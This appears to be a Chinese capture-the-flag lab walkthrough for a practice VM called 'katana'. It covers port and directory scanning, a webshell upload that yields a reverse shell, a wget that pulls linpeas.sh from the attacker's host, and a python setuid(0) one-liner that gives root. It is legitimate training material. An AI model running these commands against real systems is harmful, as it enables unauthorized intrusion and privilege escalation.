环境准备
靶机链接:百度网盘 请输入提取码
提取码:y6jf
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.arp-scan -l
探测目标靶机
2.nmap -p- -A -T4 192.168.1.119
探测目标靶机开放的端口和服务,端口一大堆
漏洞探测
1.尝试登录ftp,没有利用的信息
2.登录smb服务,也不允许查看
3.访问80端口后还有 7080 8088 8715
4.网址变成了https类型的
5. gobuster dir -u http://192.168.1.119 \ -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
探测出/ebook目录
6.gobuster dir -u http://192.168.1.119:8088 \ -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
探测8088端口下的目录,发现有upload.html
7.7080,8715扫描不出来
漏洞利用
1.登录探测出的/ebook 发现是一个书店网站
2.成功登录网站后台
3.新建一本书,上传我们的木马
4.登录错误,回到首页
5.点击edit,进入后在上传木马
6.发现没有反应,抓包查看,这里的请求方式是get ,那么木马就传不上去,放弃这条路;
7.再访问8088端口扫出来的upload.html,上传木马回弹shell
8.发现这里将上传目录变更,/opt 目录是一个大型软件安装目录,表示怪异
9.尝试触发木马,尝试好多端口都不行,只有8715可以
权限提升
1.用python回弹一个交互式shell,发现家目录下一个.ssh_passwd
2.发现用户名和密码katana@katana12345
find / -perm -u=s -type f 2>/dev/null
没有可以利用的
3.这次决定上传脚本来检测linpeas.sh(github里有)
本地开启http服务把脚本上传到靶机,进行检测
wget http://192.168.1.106:8000/linpeas.sh
4.检测到setuid 这不就是大宝贝吗
5.getcap -r / 2>/dev/null
getcap -r / 2>/dev/null getcap:查看可执行文件获取的内核权限 r:代表顶层目录 2>/dev/null:就是将标准错误stderr删掉
/usr/bin/python2.7 -c "import os;os.setuid(0);os.system('/bin/bash')"
这里直接用python来提权并且setuid(0)直接进入root,成功拿下!!!